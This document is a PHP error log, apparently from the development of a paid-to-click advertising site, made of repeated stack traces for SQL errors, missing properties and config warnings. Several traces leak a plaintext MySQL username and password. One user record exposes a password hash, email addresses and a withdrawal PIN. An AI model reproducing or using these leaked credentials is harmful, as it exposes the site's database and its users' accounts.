#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'moneyEarned' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, '30', 'PENDING', '0,000', '2010-06-26 07:57:28' ) ,[] => ,[] => 1265,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, '30', 'PENDING', '0,000', '2010-06-26 07:57:28' ) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => '30',[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:57:28))),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 12:23:29- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12:23:29 - dateClicked < 3600 LIMIT 0,1' at line 1,SQL:SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12:23:29 - dateClicked < 3600 LIMIT 0,1' at line 1,SQL:SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1,[] => ,[] => 1064,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[line] => 72,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 104,[function] => getResultRow,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1)),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 196,[function] => getOneBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => adId='2',[1] => userId='4',[2] => 2010-06-26 12:23:29 - dateClicked < 3600),[1] => Array (),[2] => 1)),[3] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 92,[function] => _oneDayPassed,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => 2)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 13:12:53- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:\Server\ptc\public_html\libraries\santilga\database\driver\Mysql.php,[] => 18,[] => Array ([0] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\database\Database.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => santilga_ptc,[password] => DOU~VV1Ab+QT,[database] => santilga_ptc))),[1] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\public_html\application\Init.php,[line] => 6,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\application\Application.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 13:12:54- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:\Server\ptc\public_html\libraries\santilga\database\driver\Mysql.php,[] => 18,[] => Array ([0] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\database\Database.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => santilga_ptc,[password] => DOU~VV1Ab+QT,[database] => santilga_ptc))),[1] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\public_html\application\Init.php,[line] => 6,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\application\Application.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 13:12:55- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:\Server\ptc\public_html\libraries\santilga\database\driver\Mysql.php,[] => 18,[] => Array ([0] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\database\Database.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => santilga_ptc,[password] => DOU~VV1Ab+QT,[database] => santilga_ptc))),[1] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\public_html\application\Init.php,[line] => 6,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\application\Application.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 26.06.10 13:12:56- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:\Server\ptc\public_html\libraries\santilga\database\driver\Mysql.php,[] => 18,[] => Array ([0] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\database\Database.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => santilga_ptc,[password] => DOU~VV1Ab+QT,[database] => santilga_ptc))),[1] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\init\Init.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\public_html\application\Init.php,[line] => 6,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\public_html\libraries\santilga\application\Application.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 28.06.10 07:28:10- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:defaultLogo

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:defaultLogo,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 11,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 37,[function] => __set,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => defaultLogo,[1] => Logo_Bean Object ([] => logo,[] => id,[] => 1,[] => Logo1,[] => logo.png,[] => 188,[] => 84,[] => 1,[] => 1))),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => bannersAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 28.06.10 13:00:05- Uncaught Santilga_Model_Exception, code: 0,Message: insertBeans :: param must be array NULL specified instead

#0 Santilga_Error->ExceptionHandler(Santilga_Model_Exception Object ([] => insertBeans :: param must be array NULL specified instead,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\model\Model.php,[] => 468,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 131,[function] => insertBeans,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => )),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => historyAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 28.06.10 13:30:20- WARNING: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in C:\Server\ptc\libraries\santilga\error\Error.php on line 156

#0 Santilga_Error->ErrorHandler(2, ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice, C:\Server\ptc\libraries\santilga\error\Error.php, 156, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:dateAdded,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\account\logins.php,[line] => 35,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => dateAdded)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\account\logins.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 153,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => attemptsAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))
#1 ob_start(ob_gzhandler) called at [C:\Server\ptc\libraries\santilga\error\Error.php:156]
#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:dateAdded,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\account\logins.php,[line] => 35,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => dateAdded)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\account\logins.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 153,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => attemptsAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 28.06.10 13:30:43- WARNING: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in C:\Server\ptc\libraries\santilga\error\Error.php on line 156

#0 Santilga_Error->ErrorHandler(2, ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice, C:\Server\ptc\libraries\santilga\error\Error.php, 156, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\account\logins.php,[line] => 38,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\account\logins.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 153,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => attemptsAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))
#1 ob_start(ob_gzhandler) called at [C:\Server\ptc\libraries\santilga\error\Error.php:156]
#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:title,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\ptc\account\logins.php,[line] => 38,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => title)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\ptc\account\logins.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 153,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => logins,[1] => account)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => attemptsAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 29.06.10 08:21:04- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:mainBalance

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:mainBalance,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 11,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 132,[function] => __set,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => mainBalance,[1] => 0.030)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 65,[function] => fillBeanFromArray,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([id] => 15,[groupId] => 1,[referrerId] => third,[username] => sixth,[password] => bd928ce41ed7f50bc3c6bf43ac36e79e,[password2] => NULL,[useSecondaryPassword] => 0,[email] => sixth@email.de,[emailPaypal] => sixth@email.de,[emailAlertPay] => sixth@email.de,[photo] => NULL,[withdrawalPin] => 1577827773,[activation] => NULL,[block] => 0,[dateOfBirth] => 1970-01-01,[registrationDate] => 2010-06-25 06:34:21,[lastVisit] => 0000-00-00 00:00:00,[payoutMinimum] => 2.000,[securityQuestion] => NULL,[securityAnswer] => NULL,[clicksCount] => 3,[mainBalance] => 0.030,[rentalBalance] => ),[1] => User_Bean Object ([] => user,[] => id,[] => 15,[] => 1,[] => third,[] => sixth,[] => bd928ce41ed7f50bc3c6bf43ac36e79e,[] => NULL,[] => 0,[] => sixth@email.de,[] => sixth@email.de,[] => sixth@email.de,[] => NULL,[] => 1577827773,[] => NULL,[] => 0,[] => 1970-01-01,[] => 2010-06-25 06:34:21,[] => 0000-00-00 00:00:00,[] => 2.000,[] => NULL,[] => NULL,[] => 3,[] => ))),[2] => Array ([file] => C:\Server\ptc\application\helpers\Userstat.php,[line] => 10,[function] => getBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => 15,[1] => 1)),[3] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 9,[function] => getStats,[class] => Userstat_Helper,[type] => ->,[args] => Array ([0] => 15)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 29.06.10 08:28:09- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:earning

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:earning,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\helpers\Userstat.php,[line] => 15,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => earning)),[1] => Array ([file] => C:\Server\ptc\application\controllers\Account.php,[line] => 9,[function] => getStats,[class] => Userstat_Helper,[type] => ->,[args] => Array ([0] => 15)),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => indexAction,[class] => Account_Controller,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 29.06.10 09:06:17- Uncaught Santilga_Database_Exception, code: 1054,Message: Unknown column 'earning' in 'field list',SQL:UPDATE user SET `earning`=earning+0.010,`clicksCount`=clicksCount+1 WHERE id in (6)

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Unknown column 'earning' in 'field list',SQL:UPDATE user SET `earning`=earning+0.010,`clicksCount`=clicksCount+1 WHERE id in (6) ,[] => ,[] => 1054,[] => C:\Server\ptc\libraries\santilga\database\driver\Mysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:\Server\ptc\libraries\santilga\model\Model.php,[line] => 344,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => UPDATE user SET `earning`=earning+0.010,`clicksCount`=clicksCount+1 WHERE id in (6) )),[1] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 305,[function] => updateBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => 6,[1] => Array ([0] => earning=earning+0.010,[1] => clicksCount=clicksCount+1),[2] => ,[3] => )),[2] => Array ([file] => C:\Server\ptc\application\controllers\Ad.php,[line] => 168,[function] => _processSuccessfullClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 6,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 192,[] => http://google.com,[] => NULL,[] => 0,[] => 1),[2] => Click_Bean Object ([] => click,[] => id,[] => 101,[] => 6,[] => 2,[] => 30,[] => PENDING,[] => 0.000,[] => 192.168.1.3,[] => 2010-06-29 09:05:39))),[3] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => verifyAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:06:46- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:07:43- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:07:54- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:08:19- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:52- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

